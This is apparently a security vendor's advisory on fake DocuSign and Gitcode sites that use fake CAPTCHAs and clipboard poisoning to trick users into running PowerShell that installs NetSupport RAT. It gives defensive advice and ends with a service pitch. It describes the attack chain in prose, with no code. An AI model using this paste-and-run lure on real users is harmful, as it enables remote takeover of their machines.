The Weaponization of Trust: How Fake DocuSign and Gitcode Sites Deploy NetSupport RAT

Cybercriminals have perfected the art of exploiting human psychology, and their latest campaign demonstrates just how sophisticated these attacks have become. Security researchers have uncovered a dangerous new threat where fake DocuSign and Gitcode websites are being used to trick users into installing NetSupport RAT malware through cleverly disguised social engineering tactics.

 Description of the Threat

The campaign uses spoofed websites that perfectly mimic legitimate services like DocuSign document verification pages and Gitcode development platforms. These fake sites employ a multi-stage attack methodology that begins with what appears to be a simple CAPTCHA verification but actually initiates a complex malware deployment process.

When victims visit these fraudulent sites, they encounter convincing DocuSign verification pages or Gitcode platforms that prompt them to complete a “verification” process. Users are instructed to check a box or follow simple steps that seem routine but actually trigger clipboard poisoning—a technique where malicious PowerShell scripts are copied to the user’s clipboard without their knowledge.

The attack relies on users following instructions to paste and execute what they believe is harmless verification code into their Windows Run command. This initial script acts as a downloader, fetching additional malicious payloads through multiple stages to ultimately install NetSupport RAT on the victim’s machine.

 Severity of the Issue

This threat represents a high-severity risk to organizations of all sizes. The campaign demonstrates several alarming characteristics:

• Multi-stage evasion: The attack uses multiple layers of script downloads to avoid detection by traditional security tools
• Exploitation of trusted brands: By impersonating DocuSign and other legitimate services, attackers exploit user trust in familiar platforms
• Broad targeting: The campaign affects education, government, and business sectors indiscriminately
• Persistent access: Once installed, NetSupport RAT provides attackers with comprehensive remote control capabilities

The malware grants threat actors the ability to monitor victim screens in real-time, control keyboards and mice, upload and download files, capture screenshots and audio, and execute malicious commands—essentially providing complete system access.

 How the Attack is Exploited

The exploitation process follows a carefully orchestrated sequence:

1. Initial Contact: Victims are likely directed to fake websites through social engineering campaigns via email or social media platforms, though the exact distribution method remains under investigation.
2. Social Engineering: The fraudulent websites present convincing interfaces that mimic trusted services, complete with legitimate branding elements and familiar user interface designs.
3. Clipboard Poisoning: When users interact with fake CAPTCHA elements or verification prompts, malicious PowerShell scripts are automatically copied to their clipboard, often using ROT13 encoding to obfuscate the content.
4. User Manipulation: Victims receive clear instructions to paste and execute the clipboard content through Windows Run commands (Win+R), leveraging the natural human tendency to follow procedural steps.
5. Multi-Stage Deployment: The initial script downloads subsequent payloads from compromised infrastructure, with each stage designed to evade security detection and analysis.
6. Persistence Establishment: The final payload installs NetSupport RAT and creates persistence mechanisms through Windows Registry entries or Startup folder modifications.

 Who is Behind the Attack

While the specific threat actors remain unidentified, security researchers have observed similarities to known cybercriminal operations. The campaign shares infrastructure patterns and techniques with the SocGholish (FakeUpdates) group, which was active in late 2024. The sophisticated nature of the operation, combined with the professional quality of the fake websites and the multi-stage evasion techniques, suggests involvement by experienced cybercriminal organizations.

The attack infrastructure utilizes domains registered through popular services like Cloudflare, NameCheap, and NameSilo, indicating a deliberate effort to blend in with legitimate web services. This professional approach to infrastructure management points to well-resourced threat actors with experience in large-scale malware distribution campaigns.

 Who is at Risk

Small and Medium Businesses: These organizations often lack comprehensive security awareness training and advanced threat detection capabilities, making them prime targets for social engineering attacks.

Educational Institutions: Schools and universities frequently handle document sharing and verification processes, making fake DocuSign sites particularly convincing to staff and students.

Government Agencies: Public sector organizations that regularly process official documents may be especially vulnerable to DocuSign impersonation attacks.

Healthcare Organizations: Medical facilities that handle patient documentation and compliance requirements represent high-value targets for remote access attacks.

Professional Services: Law firms, consulting companies, and other professional service providers that routinely use document signing platforms face elevated risk.

Any organization or individual that regularly interacts with document verification services or development platforms should consider themselves potential targets for this type of attack.

 Remediation Strategies

Immediate Actions:

• Implement comprehensive endpoint detection and response (EDR) solutions capable of detecting multi-stage PowerShell attacks
• Deploy advanced email filtering to block social engineering attempts that direct users to malicious websites
• Configure PowerShell execution policies to restrict unsigned script execution
• Establish network monitoring to detect suspicious outbound connections to unknown domains

Security Awareness Measures:

• Conduct regular training sessions focusing on social engineering recognition, particularly fake verification prompts
• Implement simulated phishing exercises that include fake document verification scenarios
• Educate users about the risks of copying and pasting unknown content into system commands
• Create clear protocols for verifying legitimate document signing requests through independent channels

Technical Controls:

• Enable Windows Defender Application Control (WDAC) or similar application whitelisting solutions
• Implement DNS filtering to block access to known malicious domains and newly registered suspicious sites
• Deploy user and entity behavior analytics (UEBA) to detect unusual system access patterns
• Establish privileged access management (PAM) to limit the impact of compromised user accounts

Monitoring and Response:

• Configure security information and event management (SIEM) systems to alert on PowerShell execution and suspicious network connections
• Implement file integrity monitoring to detect unauthorized changes to system files and registry entries
• Establish incident response procedures specifically addressing remote access trojan infections
• Create forensic capabilities to analyze multi-stage malware deployment chains

 How CinchOps Can Help Secure Your Business

In today’s threat environment, defending against sophisticated social engineering attacks requires more than traditional security measures—it demands a comprehensive, human-centered approach to cybersecurity. CinchOps understands that your employees are both your greatest asset and your most vulnerable attack surface, which is why our security solutions focus on protecting your people while strengthening your technical defenses.

Our cybersecurity experts work with you to build a robust defense strategy that addresses both the technical and human elements of modern threats:

• Advanced Threat Detection and Response – Deploy cutting-edge EDR solutions that can identify and stop multi-stage attacks like NetSupport RAT before they establish persistence on your systems
• Comprehensive Security Awareness Training – Implement ongoing education programs that teach your team to recognize and respond appropriately to social engineering attempts, including fake verification sites and document signing scams
• Email and Web Security – Install enterprise-grade filtering solutions that block malicious links and attachments while providing real-time protection against emerging threats
• Endpoint Protection and Management – Secure every device in your organization with advanced antimalware, application control, and behavioral monitoring capabilities
• Network Security Monitoring – Establish 24/7 monitoring of your network traffic to detect and respond to suspicious activities, including command and control communications
• Incident Response Planning – Develop and test comprehensive response procedures to minimize damage and recovery time in the event of a successful attack
• Vulnerability Management – Maintain current security patches and configurations across your entire IT infrastructure to prevent exploitation of known vulnerabilities
• Security Policy Development – Create and enforce security policies that address document handling, software installation, and user access controls
• Compliance and Risk Assessment – Ensure your security measures meet industry standards and regulatory requirements while identifying areas for improvement

With cyber threats becoming increasingly sophisticated and targeting human psychology rather than just technology, you need a security partner who understands both the technical and behavioral aspects of cybersecurity. CinchOps combines decades of IT experience with cutting-edge security technology to protect your business from today’s most dangerous threats while preparing you for tomorrow’s challenges.

 Discover More 

Discover more about our enterprise-grade and business protecting cybersecurity services: CinchOps Cybersecurity
Discover related topics: Hackers Disguise Malicious Login Pages as Microsoft OneNote to Steal Corporate Credentials
For Additional Information on this topic: How Threat Actors Exploit Human Trust: A Breakdown of the ‘Prove You Are Human’ Malware Scheme

FREE CYBERSECURITY ASSESSMENT